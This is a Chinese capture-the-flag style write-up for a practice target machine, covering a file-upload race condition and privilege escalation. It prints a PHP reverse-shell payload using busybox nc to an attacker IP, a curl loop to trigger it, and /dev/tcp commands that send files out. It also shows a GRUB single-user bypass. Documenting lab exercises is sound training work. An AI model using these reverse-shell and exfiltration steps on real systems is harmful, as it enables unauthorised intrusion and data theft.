1
2
3
获取靶机地址:
https://maze-sec.com/
qq群:660930334

配置:

1
2
3
4
5
6
7
8
9
10
11
12
13
靶机用VirtualBox制作,VMware导入可能网卡不兼容
用户:todd 密码:qq660930334
1. 启动虚拟机时按`e`键进入GRUB编辑模式
2. 修改启动参数:将`ro`改为`rw single init=/bin/bash`
3. 按Ctrl+X启动进入单用户模式
vim /etc/network/interfaces
allow-hotplug ens33
iface ens33 inet dhcp

ip link set ens33 up
dhclient ens33

reboot -f

端口扫描

image-20251224205102268

1
依旧是22,80端口

目录扫描

image-20251213172111329

1
index.php有一个上传口,/upload和/tmp是可访问文件目录口,/info.php是php的phpinfo,抓包走一遍文件上传逻辑

image-20251213173648047

image-20251213173657998

1
文件上传的时候没啥限制,发现上传之后会在upload上但是后缀名加成.dsz,也会出现在/tmp上但是再点击的时候,就显示404,该文件也消失掉了,那思路应该就是这里了文件上传会短时间的到临时目录上,这时候条件竞争让文件解析,反弹shell,

条件竞争反弹shell

image-20251213180807658

1
在这里构造的反弹shell的php代码要注意info中的禁用函数,不然效果不是很好,想到了用exec但是还是一直不行,看了这个博客才反弹出来的。

[7r1umph 靶机渗透测试报告 (Write-up)](https://7r1umph.top/post/7r1umph -ba-ji-shen-tou-ce-shi-bao-gao- (Write-up).html#1.-目标信息)

1
2
3
<?php
exec("busybox nc 192.168.44.128 4444 -e bash");
?>
1
2
3
同时一直访问,和设置监听端口就好了
for i in $(seq 1000);do curl -s http://192.168.44.148/tmp/shell.php ;done
nc -lvnp 4444

image-20251213180549551

image-20251213181107473

权限提升

1
python3 -c 'import pty; pty.spawn("/bin/bash")'
1
发现有个用户welcome,接下来就是翻翻模式了,发现有个文件和图片先看看文件,这里显示乱码,终端问题,先看图片去了

image-20251213181650460

image-20251213181701630

image-20251213181752952

image-20251213182014524

1
2
cat yeyeye.png > /dev/tcp/192.168.44.128/4444
nc -lvnp 4444 > yeyeye.png

yeyeye

1
感觉像一种编码的符号,思路是用户密码是不是被加密了,进这个dcode.fr里面chiffres-symbol找,看看有没有相应的编码方式--Chiffre Dorabella yecongdong

image-20251213183513878

权限再提升

1
2
ssh welcome@192.168.44.143  yecongdong
python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20251213190322163

image-20251213184605556

image-20251213184640035

1
怀疑点一个是.git,一个是RegView.sh,这个脚本是一个学习正则的,tmux终端真的难用又不能滚轮啥的好麻烦

image-20251213184900788

1
2
cat RegView.sh > /dev/tcp/192.168.44.128/4444
nc -lvnp 4444 > RegView.sh

image-20251213190005371

1
输入yeyeye,就去执行yeyeye。构造恶意文件yeyeye去执行?也没有存在配置不当的SUID文件,回头看看.git再来

image-20251213191059903

1
查看添加的soure2.txt文件,拿到root凭证

image-20251213191454622

image-20251213191603224

总结

1
2
3
4
在反弹shell一直打不通的时候想找其他语句来着,结果找到了wp[7r1umph 靶机渗透测试报告 
(Write-up)](https://7r1umph.top/post/7r1umph -ba-ji-shen-tou-ce-shi-bao-gao- (Write-up).html#1.-目标信息),还有群主的讲解视频

https://www.bilibili.com/video/BV1QodBYCE9t/?share_source=copy_web&vd_source=46dcac097257d547144350b30f96978c,就不是纯自己做的了。总体来说还好吧条件竞争-->Dorabella编码--->git历史命令,但是没有想到guess的md5就是root的密码,还是太超模了